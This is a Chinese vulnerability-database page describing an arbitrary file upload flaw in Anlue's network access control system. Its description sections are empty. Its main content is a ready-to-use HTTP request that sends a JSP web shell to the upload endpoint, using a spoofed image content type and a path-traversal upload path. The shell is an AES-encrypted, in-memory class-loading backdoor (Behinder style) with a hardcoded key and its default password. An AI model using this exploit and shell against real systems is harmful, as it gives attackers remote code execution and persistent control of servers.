安略网络准入控制系统_任意文件上传漏洞-棉花糖会员站

# 安略网络准入控制系统任意文件上传漏洞

=====================================

一、漏洞简介
————

二、漏洞影响
————

三、复现过程
————

![1.png](/static/qingy/安略网络准入控制系统_任意文件上传漏洞/img/rId24.png){width=”5.833333333333333in”
height=”3.357933070866142in”}

POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: www.0-sec.org
… …

—————————–570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name=”input_localfile”; filename=”xxx.jsp”
Content-Type: image/png

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

—————————–570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name=”uploadpath”

../webapps/notifymsg/devreport/
—————————–570xxxxxxxxx6025274xxxxxxxx1–

![2.png](/static/qingy/安略网络准入控制系统_任意文件上传漏洞/img/rId25.png){width=”5.833333333333333in”
height=”1.9321555118110236in”}

![3.png](/static/qingy/安略网络准入控制系统_任意文件上传漏洞/img/rId26.png){width=”5.833333333333333in”
height=”3.0186636045494315in”}

参考链接
——–

> https://my.oschina.net/u/4391448/blog/4562455
>
> https://blog.csdn.net/God\_XiangYu/article/details/108555525

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

安略网络准入控制系统_任意文件上传漏洞

请登录后发表评论

1一些别人的CNVD报告

2一些安全技术相关文档存档

3渗透测试工程师3年经验求职简历（已脱敏）

4eking管理易Html5Upload接口任意文件上传

5Cloudlog delete_oqrs_line 未授权SQL注入

6外面流传的2024小迪99集残缺版